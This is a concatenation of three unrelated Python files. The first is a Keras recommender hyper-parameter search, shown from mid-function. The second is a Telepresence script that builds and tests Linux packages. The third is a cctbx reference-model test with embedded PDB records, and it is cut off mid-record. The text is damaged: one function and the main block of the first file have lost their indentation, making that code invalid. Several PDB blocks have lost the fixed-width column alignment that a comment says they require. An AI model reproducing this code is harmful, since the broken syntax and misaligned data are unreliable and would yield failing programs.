                               name='user_embedding')(user_id_input)
    item_embedding = Embedding(output_dim=embedding_size,
                               input_dim=item_input_dim,
                               input_length=1,
                               name='item_embedding')(item_id_input)
    user_vecs = Flatten()(user_embedding)
    item_vecs = Flatten()(item_embedding)
    input_vecs = merge([user_vecs, item_vecs], mode='concat')
    x = Dropout(dropout_embedding)(input_vecs)
    for i in range(n_hidden):
        x = Dense(hidden_size, activation='relu')(x)
        # No dropout after the last hidden layer.
        if i < n_hidden - 1:
            x = Dropout(dropout_hidden)(x)
        if use_batchnorm:
            x = BatchNormalization()(x)
    if loss == 'cross_entropy':
        # 5 classes for ratings 1..5; targets are shifted to 0..4.
        y = Dense(output_dim=5, activation='softmax')(x)
        model = Model(input=[user_id_input, item_id_input], output=y)
        # Fix: honour the `optimizer` argument instead of the previously
        # hard-coded 'adam'.
        model.compile(optimizer=optimizer,
                      loss='sparse_categorical_crossentropy')
    else:
        y = Dense(output_dim=1)(x)
        model = Model(input=[user_id_input, item_id_input], output=y)
        model.compile(optimizer=optimizer, loss=loss)
    return model
@contextmanager
def transactional_open(path, mode='wb'):
    """Write to ``<name>.tmp`` and rename to ``path`` only on success."""
    staging = path.with_name(path.name + '.tmp')
    with staging.open(mode=mode) as stream:
        yield stream
    staging.rename(path)
@contextmanager
def transactional_fname(path):
    """Yield a temp filename; rename it onto ``path`` if the body succeeds."""
    staging = path.with_name(path.name + '.tmp')
    yield str(staging)
    staging.rename(path)
def _compute_scores(model, prefix, user_id, item_id, rating, loss):
    """Score ``model`` on one split.

    Returns a ``({prefix + '_<metric>': value}, predictions)`` pair with
    MSE, MAE and a bootstrap CI on the MAE.
    """
    preds = model.predict([user_id, item_id])
    if loss == 'cross_entropy':
        # Softmax class indices 0..4 map back to ratings 1..5.
        preds = preds.argmax(axis=1) + 1
    mae_ci_min, mae_ci_max = bootstrap_ci(mean_absolute_error,
                                          [preds, rating])
    results = {
        prefix + '_mse': mean_squared_error(preds, rating),
        prefix + '_mae': mean_absolute_error(preds, rating),
        prefix + '_mae_ci_min': mae_ci_min,
        prefix + '_mae_ci_max': mae_ci_max,
    }
    return results, preds
def evaluate_one(**kwargs):
    """Run one hyper-parameter evaluation inside a fresh TF session.

    Thin wrapper around :func:`_evaluate_one`; TF intra-op parallelism
    is capped at one thread because concurrency is handled at a coarser
    level by dask.
    """
    # Create a single threaded TF session for this Python thread:
    # parallelism is leveraged at a coarser level with dask
    session = tf.Session(
        # graph=tf.Graph(),
        config=tf.ConfigProto(intra_op_parallelism_threads=1))
    with session.as_default():
        # graph-level deterministic weights init
        tf.set_random_seed(0)
        _evaluate_one(**kwargs)
def _evaluate_one(**kwargs):
    """Train and evaluate one hyper-parameter combination.

    Merges ``kwargs`` over ``DEFAULT_PARAMS``, trains the model in 4
    rounds of 5 epochs, and after each round transactionally saves the
    metrics, the model and the predictions under
    ``results/<digest>/<epochs>/``.

    Returns the parameter digest identifying the results folder.
    """
    params = DEFAULT_PARAMS.copy()
    params.update(kwargs)
    params_digest = joblib.hash(params)
    results = params.copy()
    results['digest'] = params_digest
    results_folder = Path('results')
    results_folder.mkdir(exist_ok=True)
    folder = results_folder.joinpath(params_digest)
    folder.mkdir(exist_ok=True)
    if len(list(folder.glob("*/results.json"))) == 4:
        # All 4 checkpoints already saved: nothing to do.  The early
        # return is the fix -- previously this only printed "Skipping"
        # and then re-ran the whole evaluation anyway.
        print('Skipping')
        return params_digest
    split_idx = params.get('split_idx', 0)
    print("Evaluating model on split #%d:" % split_idx)
    pprint(params)
    # 80/20 split seeded by split_idx for reproducible folds.
    ratings_train, ratings_test = train_test_split(
        all_ratings, test_size=0.2, random_state=split_idx)
    max_user_id = all_ratings['user_id'].max()
    max_item_id = all_ratings['item_id'].max()
    user_id_train = ratings_train['user_id']
    item_id_train = ratings_train['item_id']
    rating_train = ratings_train['rating']
    user_id_test = ratings_test['user_id']
    item_id_test = ratings_test['item_id']
    rating_test = ratings_test['rating']
    loss = params.get('loss', DEFAULT_LOSS)
    if loss == 'cross_entropy':
        # Softmax head expects class indices 0..4, not ratings 1..5.
        target_train = rating_train - 1
    else:
        target_train = rating_train
    model = make_model(max_user_id + 1, max_item_id + 1, **params)
    results['model_size'] = sum(w.size for w in model.get_weights())
    nb_epoch = 5
    epochs = 0
    for i in range(4):
        epochs += nb_epoch
        t0 = time()
        model.fit([user_id_train, item_id_train], target_train,
                  batch_size=params['batch_size'],
                  nb_epoch=nb_epoch, shuffle=True, verbose=False)
        epoch_duration = (time() - t0) / nb_epoch
        train_scores, train_preds = _compute_scores(
            model, 'train', user_id_train, item_id_train, rating_train, loss)
        results.update(train_scores)
        test_scores, test_preds = _compute_scores(
            model, 'test', user_id_test, item_id_test, rating_test, loss)
        results.update(test_scores)
        results['epoch_duration'] = epoch_duration
        results['epochs'] = epochs
        subfolder = folder.joinpath("%03d" % epochs)
        subfolder.mkdir(exist_ok=True)
        # Transactional results saving to avoid file corruption on ctrl-c
        results_filepath = subfolder.joinpath(RESULTS_FILENAME)
        with transactional_open(results_filepath, mode='w') as f:
            json.dump(results, f)
        model_filepath = subfolder.joinpath(MODEL_FILENAME)
        with transactional_fname(model_filepath) as fname:
            model.save(fname)
        # Save predictions and true labels to be able to recompute new
        # scores later
        with transactional_open(subfolder / 'test_preds.npy', mode='wb') as f:
            np.save(f, test_preds)
        # Fix: the train predictions file previously saved test_preds.
        with transactional_open(subfolder / 'train_preds.npy', mode='wb') as f:
            np.save(f, train_preds)
        with transactional_open(subfolder / 'ratings.npy', mode='wb') as f:
            np.save(f, rating_test)
    return params_digest
def _model_complexity_proxy(params):
# Quick approximation of the number of tunable parameter to rank models
# by increasing complexity
embedding_size = params['embedding_size']
n_hidden = params['n_hidden']
if n_hidden == 0:
return embedding_size * 2
else:
hidden_size = params['hidden_size']
return (2 * embedding_size * hidden_size +
(n_hidden - 1) * hidden_size ** 2)
if __name__ == "__main__":
seed = 0
n_params = 500
all_combinations = list(ParameterGrid(SEARCH_SPACE))
random.Random(seed).shuffle(all_combinations)
sampled_params = all_combinations[:n_params]
sampled_params.sort(key=_model_complexity_proxy)
evaluations = []
for params in sampled_params:
for split_idx in range(3):
evaluations.append(delayed(evaluate_one)(
split_idx=split_idx, **params))
compute(*evaluations)
|
#!/usr/bin/env python3
# Copyright 2018 Datawire. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Create Ubuntu and Fedora packages in dist.
Usage:
create-linux-packages.py <release-version>
"""
import sys
from pathlib import Path
from typing import List
from container import Container
from distros import distros
# This script lives next to the "dist" directory, which holds the
# telepresence binaries and receives the built packages.
THIS_DIRECTORY = Path(__file__).absolute().resolve().parent
DIST = THIS_DIRECTORY.parent / "dist"
def show_banner(text, char="=", width=79):
    """
    Print *text* as a banner padded with *char* out to *width* columns.
    """
    banner = "{}{} {}".format(char, char, text)
    fill = width - len(banner) - 1
    if fill > 0:
        banner = "{} {}".format(banner, char * fill)
    print("\n" + banner + "\n")
def prep_to_build() -> Container:
    """
    Prepare container to build packages
    """
    # Alpine + fpm provides both .deb and .rpm tooling in one image.
    con = Container("alpine:3.7")
    con.execute_sh("apk update -q")
    con.execute_sh("apk add -q alpine-sdk dpkg-dev rpm-dev ruby ruby-dev")
    con.execute_sh("gem install -q --no-ri --no-rdoc fpm")
    # The two executables every package ships.
    con.copy_to(str(DIST / "telepresence"), "/usr/bin")
    con.copy_to(str(DIST / "sshuttle-telepresence"), "/usr/bin")
    return con
def build_package(
    con: Container, name: str, version: str, dependencies: List[str],
    package_type: str
) -> str:
    """
    Build a package in the prepared build container
    """
    # fpm arguments common to every package.
    fpm_header = [
        "fpm",
        "--name=telepresence",
        "--version={}".format(version),
        "--description=Local development for a remote Kubernetes cluster.",
        "--input-type=dir",
    ]
    fpm_deps = ["--depends={}".format(dep) for dep in dependencies]
    fpm_type = ["--output-type={}".format(package_type)]
    # Files (already copied into the container) that make up the package.
    fpm_trailer = [
        "/usr/bin/sshuttle-telepresence",
        "/usr/bin/telepresence",
    ]
    # Build inside a per-distro directory in the container, then copy
    # the produced package back out into dist/<name>/.
    target_path = DIST / name
    target_path.mkdir()
    pkg_dir = "/" + name
    con.execute_sh("mkdir {}".format(pkg_dir))
    con.execute(fpm_header + fpm_deps + fpm_type + fpm_trailer, cwd=pkg_dir)
    # fpm wrote exactly one file into the previously-empty directory.
    pkg_name = con.execute_sh("ls", cwd=pkg_dir).strip()
    con.copy_from(str(Path(pkg_dir) / pkg_name), str(target_path))
    # Return the package path relative to dist/.
    rel_package = str(Path(name) / pkg_name)
    return rel_package
def test_package(image: str, package: Path, install_cmd: str):
    """
    Test a package can be installed and Telepresence run.
    """
    con = Container(image)
    con.execute_sh("mkdir /packages")
    con.copy_to(str(package), "/packages")
    package_path = "/packages/{}".format(package.name)
    # install_cmd is itself a format template; substitute the path of
    # the copied package into it, and fail fast with `set -e`.
    command = "set -e\n{}".format(install_cmd).format(package_path)
    con.execute(["sh", "-c", command])
    # Smoke test: the installed binaries must at least report a version.
    con.execute_sh("python3 --version")
    con.execute_sh("telepresence --version")
    con.execute_sh("sshuttle-telepresence --version")
def get_upload_commands(system, release, package):
    """Returns the required package_cloud commands to upload this package"""
    template = "package_cloud push {}/{}/{} {}"
    return [
        template.format(repo, system, release, package)
        for repo in ("datawireio/stable", "datawireio/telepresence")
    ]
def main(version):
    """Create Linux packages"""
    show_banner("Building packages...")
    con = prep_to_build()
    uploads = []
    # distros yields (system, release, package_type, deps, install_cmd).
    for system, release, package_type, dependencies, install_cmd in distros:
        name = "{}-{}".format(system, release)
        show_banner("Build {}".format(name))
        rel_package = build_package(
            con, name, version, dependencies, package_type
        )
        package = DIST / rel_package
        # Verify the package installs and runs in a clean distro image.
        show_banner("Test {}".format(name))
        image = "{}:{}".format(system, release)
        test_package(image, package, install_cmd)
        rel_package = package.relative_to(DIST)
        uploads.extend(get_upload_commands(system, release, rel_package))
    # Emit an executable helper script containing every package_cloud
    # upload command collected above.
    upload_script = Path(DIST / "upload_linux_packages.sh")
    with upload_script.open("w") as f:
        f.write("#!/bin/sh\n\n")
        f.write("set -e\n\n")
        f.write('cd "$(dirname "$0")"\n')
        f.write("\n".join(uploads))
        f.write("\n")
    upload_script.chmod(0o775)
# Script entry point: the release version string is the only argument.
if __name__ == '__main__':
    main(sys.argv[1])
|
from __future__ import division
from mmtbx import monomer_library
from mmtbx.geometry_restraints.torsion_restraints.reference_model import \
reference_model, reference_model_params
from mmtbx.geometry_restraints.torsion_restraints import utils
from mmtbx.validation.rotalyze import rotalyze
import mmtbx.model
from cctbx.array_family import flex
import iotbx.phil
import iotbx.pdb
from libtbx.test_utils import show_diff
import libtbx.load_env
import cStringIO
import sys, os, time
# Two-residue (ASN-LEU) fragment used as the working model.
# NOTE(review): PDB records are fixed-width; column alignment must be
# preserved exactly.
model_raw_records = """\
CRYST1 41.566 72.307 92.870 108.51 93.02 90.06 P 1 4
ATOM 5466 N ASN C 236 17.899 72.943 29.028 1.00 60.13 N
ATOM 5467 CA ASN C 236 16.519 72.435 29.114 1.00 60.52 C
ATOM 5468 C ASN C 236 16.377 70.925 29.327 1.00 60.49 C
ATOM 5469 O ASN C 236 15.429 70.294 28.863 1.00 60.60 O
ATOM 5470 CB ASN C 236 15.689 72.896 27.916 1.00 60.55 C
ATOM 5471 CG ASN C 236 14.357 73.447 28.338 1.00 61.75 C
ATOM 5472 OD1 ASN C 236 14.256 74.609 28.768 1.00 62.86 O
ATOM 5473 ND2 ASN C 236 13.319 72.616 28.247 1.00 61.22 N
ATOM 5474 N LEU C 237 17.316 70.364 30.068 1.00 60.55 N
ATOM 5475 CA LEU C 237 17.444 68.931 30.166 1.00 60.48 C
ATOM 5476 C LEU C 237 17.815 68.555 31.581 1.00 60.06 C
ATOM 5477 O LEU C 237 17.335 67.547 32.097 1.00 60.41 O
ATOM 5478 CB LEU C 237 18.518 68.464 29.178 1.00 60.91 C
ATOM 5479 CG LEU C 237 18.542 67.095 28.491 1.00 62.25 C
ATOM 5480 CD1 LEU C 237 17.407 66.153 28.923 1.00 63.18 C
ATOM 5481 CD2 LEU C 237 18.563 67.309 26.965 1.00 62.89 C
"""
# Same two residues, same chain/numbering, from a reference structure.
reference_raw_records = """\
CRYST1 40.688 71.918 93.213 108.16 93.25 90.40 P 1 4
ATOM 5485 N ASN C 236 16.417 72.834 29.095 1.00 7.17 N
ATOM 5486 CA ASN C 236 15.051 72.312 29.173 1.00 7.74 C
ATOM 5487 C ASN C 236 15.000 70.818 29.431 1.00 7.38 C
ATOM 5488 O ASN C 236 14.047 70.141 29.024 1.00 7.80 O
ATOM 5489 CB ASN C 236 14.281 72.645 27.887 1.00 8.78 C
ATOM 5490 CG ASN C 236 12.769 72.657 28.088 1.00 13.44 C
ATOM 5491 OD1 ASN C 236 12.265 73.196 29.082 1.00 20.19 O
ATOM 5492 ND2 ASN C 236 12.032 72.114 27.109 1.00 16.07 N
ATOM 5493 N LEU C 237 16.010 70.282 30.134 1.00 6.60 N
ATOM 5494 CA LEU C 237 16.122 68.825 30.270 1.00 7.41 C
ATOM 5495 C LEU C 237 16.481 68.430 31.697 1.00 6.01 C
ATOM 5496 O LEU C 237 15.944 67.448 32.224 1.00 6.47 O
ATOM 5497 CB LEU C 237 17.151 68.239 29.297 1.00 8.10 C
ATOM 5498 CG LEU C 237 17.384 66.726 29.347 1.00 10.94 C
ATOM 5499 CD1 LEU C 237 16.055 65.956 29.107 1.00 13.10 C
ATOM 5500 CD2 LEU C 237 18.455 66.271 28.343 1.00 11.63 C
"""
# Same reference, but renumbered/renamed (chain B, 246-247) to exercise
# explicit reference_group selections.
reference_raw_records_alt_seq = """\
CRYST1 40.688 71.918 93.213 108.16 93.25 90.40 P 1 4
ATOM 5485 N ASN B 246 16.417 72.834 29.095 1.00 7.17 N
ATOM 5486 CA ASN B 246 15.051 72.312 29.173 1.00 7.74 C
ATOM 5487 C ASN B 246 15.000 70.818 29.431 1.00 7.38 C
ATOM 5488 O ASN B 246 14.047 70.141 29.024 1.00 7.80 O
ATOM 5489 CB ASN B 246 14.281 72.645 27.887 1.00 8.78 C
ATOM 5490 CG ASN B 246 12.769 72.657 28.088 1.00 13.44 C
ATOM 5491 OD1 ASN B 246 12.265 73.196 29.082 1.00 20.19 O
ATOM 5492 ND2 ASN B 246 12.032 72.114 27.109 1.00 16.07 N
ATOM 5493 N LEU B 247 16.010 70.282 30.134 1.00 6.60 N
ATOM 5494 CA LEU B 247 16.122 68.825 30.270 1.00 7.41 C
ATOM 5495 C LEU B 247 16.481 68.430 31.697 1.00 6.01 C
ATOM 5496 O LEU B 247 15.944 67.448 32.224 1.00 6.47 O
ATOM 5497 CB LEU B 247 17.151 68.239 29.297 1.00 8.10 C
ATOM 5498 CG LEU B 247 17.384 66.726 29.347 1.00 10.94 C
ATOM 5499 CD1 LEU B 247 16.055 65.956 29.107 1.00 13.10 C
ATOM 5500 CD2 LEU B 247 18.455 66.271 28.343 1.00 11.63 C
"""
# Reference with different numbering and a LEU->ALA substitution, for
# sequence-matching tests.
reference_raw_records_match = """\
CRYST1 40.688 71.918 93.213 108.16 93.25 90.40 P 1 4
ATOM 5485 N ASN C 270 16.417 72.834 29.095 1.00 7.17 N
ATOM 5486 CA ASN C 270 15.051 72.312 29.173 1.00 7.74 C
ATOM 5487 C ASN C 270 15.000 70.818 29.431 1.00 7.38 C
ATOM 5488 O ASN C 270 14.047 70.141 29.024 1.00 7.80 O
ATOM 5489 CB ASN C 270 14.281 72.645 27.887 1.00 8.78 C
ATOM 5490 CG ASN C 270 12.769 72.657 28.088 1.00 13.44 C
ATOM 5491 OD1 ASN C 270 12.265 73.196 29.082 1.00 20.19 O
ATOM 5492 ND2 ASN C 270 12.032 72.114 27.109 1.00 16.07 N
ATOM 5493 N ALA C 271 16.010 70.282 30.134 1.00 6.60 N
ATOM 5494 CA ALA C 271 16.122 68.825 30.270 1.00 7.41 C
ATOM 5495 C ALA C 271 16.481 68.430 31.697 1.00 6.01 C
ATOM 5496 O ALA C 271 15.944 67.448 32.224 1.00 6.47 O
ATOM 5497 CB ALA C 271 17.151 68.239 29.297 1.00 8.10 C
"""
def exercise_reference_model(args, mon_lib_srv, ener_lib):
    """Exercise the reference_model torsion-restraint machinery.

    Covers proxy generation from an in-memory reference, name/element
    hashing, rotamer fix-up against the reference, residue matching for
    an alternate chain/numbering, proxy counts for a regression PDB,
    optional KSDSSP secondary-structure-only restraints, and SSM
    alignment.
    """
    log = cStringIO.StringIO()
    # Default parameters with restraints enabled; no rotamer-outlier
    # fixing so the rotamer comparison below is meaningful.
    work_params = reference_model_params.extract()
    work_params.reference_model.enabled = True
    work_params.reference_model.fix_outliers = False
    model = mmtbx.model.manager(
        model_input = iotbx.pdb.input(lines=flex.split_lines(model_raw_records),
                                      source_info=None),
        process_input=True)
    pdb_h = model.get_hierarchy()
    # Build the reference hierarchy from the in-memory records.
    reference_hierarchy_list = []
    tmp_hierarchy = iotbx.pdb.input(
        source_info=None,
        lines=flex.split_lines(reference_raw_records)).construct_hierarchy()
    reference_hierarchy_list.append(tmp_hierarchy)
    rm = reference_model(
        model=model,
        reference_hierarchy_list=reference_hierarchy_list,
        params=work_params.reference_model,
        log=log)
    assert rm.get_n_proxies() == 5, "Got %d, expected 5" % rm.get_n_proxies()
    # Additional reference hierarchies used further below.
    reference_hierarchy_list_alt_seq = []
    tmp_hierarchy = iotbx.pdb.input(
        source_info=None,
        lines=flex.split_lines(reference_raw_records_alt_seq)).\
        construct_hierarchy()
    reference_hierarchy_list_alt_seq.append(tmp_hierarchy)
    reference_hierarchy_list_ref_match = []
    tmp_hierarchy = iotbx.pdb.input(
        source_info=None,
        lines=flex.split_lines(reference_raw_records_match)).\
        construct_hierarchy()
    reference_hierarchy_list_ref_match.append(tmp_hierarchy)
    # i_seq -> fixed-width atom label hash for the working model.
    i_seq_name_hash = utils.build_name_hash(
        pdb_hierarchy=pdb_h)
    assert i_seq_name_hash == \
        {0: ' N ASN C 236 ', 1: ' CA ASN C 236 ',
         2: ' C ASN C 236 ', 3: ' O ASN C 236 ',
         4: ' CB ASN C 236 ', 5: ' CG ASN C 236 ',
         6: ' OD1 ASN C 236 ', 7: ' ND2 ASN C 236 ',
         8: ' N LEU C 237 ', 9: ' CA LEU C 237 ',
         10: ' C LEU C 237 ', 11: ' O LEU C 237 ',
         12: ' CB LEU C 237 ', 13: ' CG LEU C 237 ',
         14: ' CD1 LEU C 237 ', 15: ' CD2 LEU C 237 '}
    # i_seq -> element symbol hash.
    i_seq_element_hash = utils.build_element_hash(
        pdb_hierarchy=pdb_h)
    assert i_seq_element_hash == \
        {0: 'N', 1: 'C', 2: 'C', 3: 'O', 4: 'C', 5: 'C', 6: 'O', 7: 'N', 8: 'N',
         9: 'C', 10: 'C', 11: 'O', 12: 'C', 13: 'C', 14: 'C', 15: 'C'}
    # Dihedral proxies computed on the reference must match the 5
    # reference-model proxies generated above.
    ref_pdb_hierarchy = reference_hierarchy_list[0]
    dihedral_proxies = \
        utils.get_complete_dihedral_proxies(pdb_hierarchy=ref_pdb_hierarchy)
    sites_cart_ref = ref_pdb_hierarchy.atoms().extract_xyz()
    dihedral_hash = rm.build_dihedral_hash(
        dihedral_proxies=dihedral_proxies,
        sites_cart=sites_cart_ref,
        pdb_hierarchy=ref_pdb_hierarchy,
        include_hydrogens=False,
        include_main_chain=True,
        include_side_chain=True)
    assert len(dihedral_hash) == 5
    reference_dihedral_proxies = rm.reference_dihedral_proxies.deep_copy()
    assert reference_dihedral_proxies is not None
    assert len(reference_dihedral_proxies) == len(dihedral_hash)
    for rdp in reference_dihedral_proxies:
        assert rdp.limit == work_params.reference_model.limit
    # Model rotamers start as outliers; the reference's are favored.
    r1 = rotalyze(pdb_hierarchy=pdb_h, outliers_only=False)
    out1 = cStringIO.StringIO()
    r1.show_old_output(out=out1)
    r2 = rotalyze(pdb_hierarchy=ref_pdb_hierarchy, outliers_only=False)
    out2 = cStringIO.StringIO()
    r2.show_old_output(out=out2)
    assert not show_diff(out1.getvalue(), """\
C 236 ASN:1.00:0.2:227.3:80.2:::OUTLIER:OUTLIER
C 237 LEU:1.00:0.0:209.6:357.2:::OUTLIER:OUTLIER
""")
    assert not show_diff(out2.getvalue(), """\
C 236 ASN:1.00:39.1:203.2:43.6:::Favored:t0
C 237 LEU:1.00:60.8:179.1:57.3:::Favored:tp
""")
    # Snapping rotamers to the reference must turn both into the
    # reference's favored rotamers.
    xray_structure = pdb_h.extract_xray_structure()
    rm.set_rotamer_to_reference(
        xray_structure=xray_structure,
        mon_lib_srv=mon_lib_srv,
        quiet=True)
    pdb_h.adopt_xray_structure(xray_structure)
    r2 = rotalyze(pdb_hierarchy=pdb_h, outliers_only=False)
    out3 = cStringIO.StringIO()
    r2.show_old_output(out=out3)
    assert not show_diff(out3.getvalue(), """\
C 236 ASN:1.00:39.1:203.2:43.6:::Favored:t0
C 237 LEU:1.00:60.8:179.1:57.3:::Favored:tp
""")
    # Identical numbering: the atom match map is the identity.
    match_map = rm.match_map['ref0']
    assert match_map == \
        {0: 0, 1: 1, 2: 2, 3: 3, 4: 4, 5: 5, 6: 6, 7: 7, 8: 8, 9: 9, 10: 10, 11: 11,
         12: 12, 13: 13, 14: 14, 15: 15}
    # Explicit reference_group selection maps chain B 246-247 onto
    # chain C 236-237; the match map must still be the identity.
    master_phil_str_overrides = """
reference_model.reference_group {
reference= chain B and resseq 246:247
selection= chain C and resid 236:237
}
"""
    def_pars = reference_model_params
    pars = iotbx.phil.parse(master_phil_str_overrides)
    all_pars = def_pars.fetch(pars).extract()
    all_pars.reference_model.enabled = True
    rm = reference_model(
        model = model,
        reference_hierarchy_list=reference_hierarchy_list_alt_seq,
        params=all_pars.reference_model,
        log=log)
    match_map = rm.match_map
    assert match_map['ref0'] == \
        {0: 0, 1: 1, 2: 2, 3: 3, 4: 4, 5: 5, 6: 6, 7: 7, 8: 8, 9: 9, 10: 10, 11: 11,
         12: 12, 13: 13, 14: 14, 15: 15}
    # Regression structure used as its own reference: check the number
    # of unit-weight proxies.
    pdb_file = libtbx.env.find_in_repositories(
        relative_path="phenix_regression/pdb/1ywf.pdb",
        test=os.path.isfile)
    model = mmtbx.model.manager(
        model_input = iotbx.pdb.input(file_name=pdb_file,
                                      source_info=None),
        process_input=True)
    pdb_h = model.get_hierarchy()
    # pdb_hierarchy = iotbx.pdb.input(file_name=pdb_file).construct_hierarchy()
    reference_file_list = []
    reference_file_list.append(pdb_file)
    work_pars = reference_model_params.extract()
    work_pars.reference_model.fix_outliers = False
    work_pars.reference_model.enabled = True
    rm = reference_model(
        model=model,
        reference_file_list=reference_file_list,
        params=work_pars.reference_model,
        log=log)
    reference_dihedral_proxies = rm.reference_dihedral_proxies
    standard_weight = 0
    for dp in reference_dihedral_proxies:
        if dp.weight == 1.0:
            standard_weight += 1
    assert standard_weight == 1181, "Expecting 1181, got %d" % standard_weight
    # Restricting to secondary structure (via KSDSSP) reduces the proxy
    # count; skipped when the ksdssp module is absent.
    if (not libtbx.env.has_module(name="ksdssp")):
        print "Skipping KSDSSP tests: ksdssp module not available."
    else:
        work_pars = reference_model_params.extract()
        work_pars.reference_model.secondary_structure_only = True
        work_pars.reference_model.enabled = True
        rm.params = work_pars.reference_model
        rm.get_reference_dihedral_proxies(model=model)
        reference_dihedral_proxies = rm.reference_dihedral_proxies
        ss_weight = 0
        for dp in reference_dihedral_proxies:
            if dp.weight == 1.0:
                ss_weight += 1
        assert ss_weight == 694, "expecting 694 proxies, got %d" % ss_weight
    #test SSM alignment
    pdb_file = libtbx.env.find_in_repositories(
        relative_path="phenix_regression/ncs/rnase-s.pdb",
        test=os.path.isfile)
    pdb_hierarchy = iotbx.pdb.input(file_name=pdb_file).construct_hierarchy()
    reference_file_list = []
    reference_file_list.append(pdb_file)
    pdb_hierarchy.reset_i_seq_if_necessary()
    import ccp4io_adaptbx
    ssm = ccp4io_adaptbx.SecondaryStructureMatching(
        reference=pdb_hierarchy.models()[0].chains()[0],
        moving=pdb_hierarchy.models()[0].chains()[1])
    alignment = ccp4io_adaptbx.SSMAlignment.residue_groups(match=ssm)
    assert ssm.GetQvalues()[0] > 0.98
def exercise_multiple_to_one(args, mon_lib_srv, ener_lib):
  """Exercise reference-model restraints where several model chains are
  restrained against a single reference chain.

  The model holds four identical chains (A, B, C, D); the reference file
  contains a minimized copy of chain A only.  Proxy counts are checked for:
    * explicit reference_group selections all pointing at one file,
    * the same groups spread over four identical copies of the reference,
    * a single group (plus the side_chain / main_chain switches),
    * no groups at all (automatic matching),
    * use_starting_model_as_reference, which must map each chain onto itself.

  NOTE(review): ``args``, ``mon_lib_srv`` and ``ener_lib`` are not used in
  the body; the signature matches the other exercises in this file.
  """
  pdb_str_original = """\
CRYST1   69.211   49.956   52.557  90.00  90.00  90.00 P 1
ATOM      1  N   THR A   3      51.193  44.956  23.993  1.00 80.52           N
ATOM      2  CA  THR A   3      50.812  43.732  23.211  1.00 80.52           C
ATOM      4  CB  THR A   3      50.446  42.559  24.181  1.00 79.62           C
ATOM      6  OG1 THR A   3      50.206  41.358  23.433  1.00 79.62           O
ATOM      8  CG2 THR A   3      49.239  42.888  25.066  1.00 79.62           C
ATOM     12  C   THR A   3      49.657  44.014  22.221  1.00 80.52           C
ATOM     13  O   THR A   3      48.520  44.223  22.631  1.00 80.52           O
ATOM     17  N   GLY A   4      49.963  44.013  20.917  1.00 79.31           N
ATOM     18  CA  GLY A   4      49.030  44.458  19.892  1.00 79.31           C
ATOM     21  C   GLY A   4      48.761  43.480  18.761  1.00 79.31           C
ATOM     22  O   GLY A   4      47.790  42.725  18.808  1.00 79.31           O
ATOM     24  N   ALA A   5      49.581  43.499  17.715  1.00 78.81           N
ATOM     25  CA  ALA A   5      49.395  42.604  16.581  1.00 78.81           C
ATOM     27  CB  ALA A   5      49.774  43.314  15.283  1.00 77.40           C
ATOM     31  C   ALA A   5      50.195  41.315  16.714  1.00 78.81           C
ATOM     32  O   ALA A   5      50.258  40.537  15.757  1.00 78.81           O
ATOM     34  N   GLN A   6      50.816  41.073  17.872  1.00 80.55           N
ATOM     35  CA  GLN A   6      51.642  39.880  18.018  1.00 80.55           C
ATOM     37  CB  GLN A   6      52.383  39.879  19.354  1.00 79.84           C
ATOM     40  CG  GLN A   6      53.264  41.072  19.596  1.00 79.84           C
ATOM     43  CD  GLN A   6      52.490  42.211  20.225  1.00 79.84           C
ATOM     44  OE1 GLN A   6      51.290  42.091  20.489  1.00 79.84           O
ATOM     45  NE2 GLN A   6      53.167  43.325  20.468  1.00 79.84           N
ATOM     48  C   GLN A   6      50.788  38.631  17.945  1.00 80.55           C
ATOM     49  O   GLN A   6      51.148  37.659  17.273  1.00 80.55           O
ATOM     51  N   VAL A   7      49.643  38.651  18.631  1.00 79.06           N
ATOM     52  CA  VAL A   7      48.822  37.460  18.795  1.00 79.06           C
ATOM     54  CB  VAL A   7      47.610  37.794  19.688  1.00 78.99           C
ATOM     56  CG1 VAL A   7      46.649  36.606  19.794  1.00 78.99           C
ATOM     60  CG2 VAL A   7      48.075  38.245  21.063  1.00 78.99           C
ATOM     64  C   VAL A   7      48.399  36.907  17.450  1.00 79.06           C
ATOM     65  O   VAL A   7      47.962  35.755  17.360  1.00 79.06           O
ATOM     67  N   TYR A   8      48.538  37.700  16.390  1.00 79.78           N
ATOM     68  CA  TYR A   8      48.445  37.147  15.051  1.00 79.78           C
ATOM     70  CB  TYR A   8      48.732  38.228  14.014  1.00 77.69           C
ATOM     73  CG  TYR A   8      48.634  37.736  12.583  1.00 77.69           C
ATOM     74  CD1 TYR A   8      47.404  37.638  11.944  1.00 77.69           C
ATOM     76  CE1 TYR A   8      47.308  37.187  10.640  1.00 77.69           C
ATOM     78  CZ  TYR A   8      48.444  36.802   9.966  1.00 77.69           C
ATOM     79  OH  TYR A   8      48.355  36.348   8.672  1.00 77.69           O
ATOM     81  CE2 TYR A   8      49.672  36.872  10.580  1.00 77.69           C
ATOM     83  CD2 TYR A   8      49.763  37.333  11.883  1.00 77.69           C
ATOM     85  C   TYR A   8      49.416  35.991  14.857  1.00 79.78           C
ATOM     86  O   TYR A   8      49.202  35.164  13.967  1.00 79.78           O
ATOM     88  N   ALA A   9      50.475  35.912  15.671  1.00 79.03           N
ATOM     89  CA  ALA A   9      51.463  34.844  15.546  1.00 79.02           C
ATOM     91  CB  ALA A   9      52.444  34.896  16.719  1.00 79.18           C
ATOM     95  C   ALA A   9      50.833  33.459  15.484  1.00 79.02           C
ATOM     96  O   ALA A   9      51.470  32.524  14.982  1.00 79.02           O
ATOM     98  N   ASN A  10      49.611  33.298  16.002  1.00 79.63           N
ATOM     99  CA  ASN A  10      48.890  32.036  15.896  1.00 79.63           C
ATOM    101  CB  ASN A  10      47.838  31.938  17.002  1.00 78.91           C
ATOM    104  CG  ASN A  10      48.455  31.885  18.387  1.00 78.91           C
ATOM    105  OD1 ASN A  10      49.636  31.603  18.527  1.00 78.91           O
ATOM    106  ND2 ASN A  10      47.648  32.113  19.418  1.00 78.91           N
ATOM    109  C   ASN A  10      48.213  31.859  14.543  1.00 79.63           C
ATOM    110  O   ASN A  10      47.724  30.767  14.246  1.00 79.63           O
TER      58      ASN A  10
ATOM   1990  N   THR B   3      21.107   5.000  45.226  1.00 82.71           N
ATOM   1991  CA  THR B   3      21.187   6.487  45.312  1.00 82.71           C
